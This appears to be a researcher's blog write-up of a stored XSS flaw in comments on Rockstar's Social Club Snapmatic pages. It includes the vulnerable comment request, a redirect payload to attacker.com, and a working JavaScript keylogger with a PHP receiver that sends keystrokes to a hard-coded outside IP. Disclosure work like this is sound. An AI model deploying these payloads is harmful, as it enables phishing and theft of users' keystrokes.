Stored XSS on Rockstar Game


Severity: High

Complexity : Easy

Weakness : Cross Site Scripting

Date : Nov 2016


  • Rockstar’s Current Game GTA V have a feature Snapmatic which is a app in game to take picture’s while playing and it get’s uploaded at socialclub.rockstargames.com
https://socialclub.rockstargames.com/games/gtav/pc/snapmatic
  • Other’s users of rockstar games have ability to view and comment on snapmatic picture’s .
  • Vulnerability was while commenting on snapmatic picture’s they were not filtering malicious tags / javascript .

POST /games/gtav/snapmatic/ajax/comment HTTP/1.1
Host: socialclub.rockstargames.com
Connection: close
Content-Length: 57
Accept: application/json, text/javascript, */*; q=0.01
RequestVerificationToken: REDACTEDTOKEN
Origin: https://socialclub.rockstargames.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
Content-Type: application/json
Referer: https://socialclub.rockstargames.com/games/gtav/snapmatic/mostrecent/photo/zVqgrrjUl0q8tRsmDvMi0w
Accept-Language: en-US,en;q=0.8
Cookie: csrf:token<REDACTED>
{"ugcId":"PICTUREID","comment":"PAYLOAD HERE"}

  • I Used the Basic payload to check the response & got script popup.

  • Worst Scenario is Script was directly getting executed in background when viewing images from https://socialclub.rockstargames.com/games/gtav/pc/snapmatic that might be because of rendering the first comment’s .
  • To Increase the impact i tried to find ways to make other user’s to comment payload on snapmatic images’s just like a WORM using ajax call’s but unfortunately they were using extra protection for csrf checking as you can see from above request.
  • As payload is getting render directly on main page /snapmatic
  • We can redirect all the user’s visiting /snapmatic to attacker choice url just like phishing .
<script>window.onload = window.location.href= ‘https://attacker.com';</script>

  • Or By adding a Keylogger :
  • Keylog.js
document.onkeypress = function(evt) {
evt = evt || window.event
key = String.fromCharCode(evt.charCode)
if (key) {
var http = new XMLHttpRequest();
var param = encodeURI(key)
http.open("POST","http://52.61.158.123/keylog/keylog.php",true);
http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
http.send("key="+param);
}
}
  • Keylog.php
<?php
$key=$_POST['key'];
$logfile="keylog.txt";
$fp = fopen($logfile, "a");
fwrite($fp, $key);
fclose($fp);
?>

Like what you read? Give Arbaz Hussain a round of applause.

From a quick cheer to a standing ovation, clap to show how much you enjoyed this story.